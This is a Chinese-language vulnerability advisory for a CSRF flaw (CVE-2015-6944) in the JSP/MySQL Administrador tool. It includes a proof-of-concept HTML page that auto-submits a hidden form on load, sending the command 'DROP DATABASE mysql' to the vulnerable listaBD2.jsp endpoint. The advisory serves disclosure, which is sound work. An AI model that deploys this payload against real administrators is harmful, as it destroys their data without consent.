JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)


JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)


发布日期:2015-09-15
更新日期:2015-09-16

受影响系统:

JSPMySQL Administrador JSPMySQL Administrador 0.1

描述:


CVE(CAN) ID: CVE-2015-6944

JSPMySQL Administrador是JSP技术Web服务器上MySQL数据库的远程管理工具。

JSP/MySQL Administrador Web 1在实现上存在跨站请求伪造漏洞,远程攻击者通过sys/sys/listaBD2.jsp的cmd参数,利用此漏洞可劫持用户的身份验证请求。

<*来源:hyp3rlinx
 
  链接:http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

hyp3rlinx ()提供了如下测试方法:

<!DOCTYPE>
< html>
< head>
< title>JSP-MYSQL-ADMIN-CSRF</title>

< body onLoad="doit()">

< script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}

< !-- CSRF DROP MYSQL DATABASE -->

< form id="HELL" action="http://localhost:8081/sys/sys/listaBD2.jsp" method="post">
< input type="text" name="cmd" value="DROP DATABASE mysql"/>
< input type="text" name="btncmd" value="Enviar" />
< input type="text" name="bd" value="mysql" />
< /form>

建议:


厂商补丁:

JSPMySQL Administrador
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://sites.google.com/site/mfpledon/producao-de-software

本文永久更新链接地址

相关内容

    暂无相关文章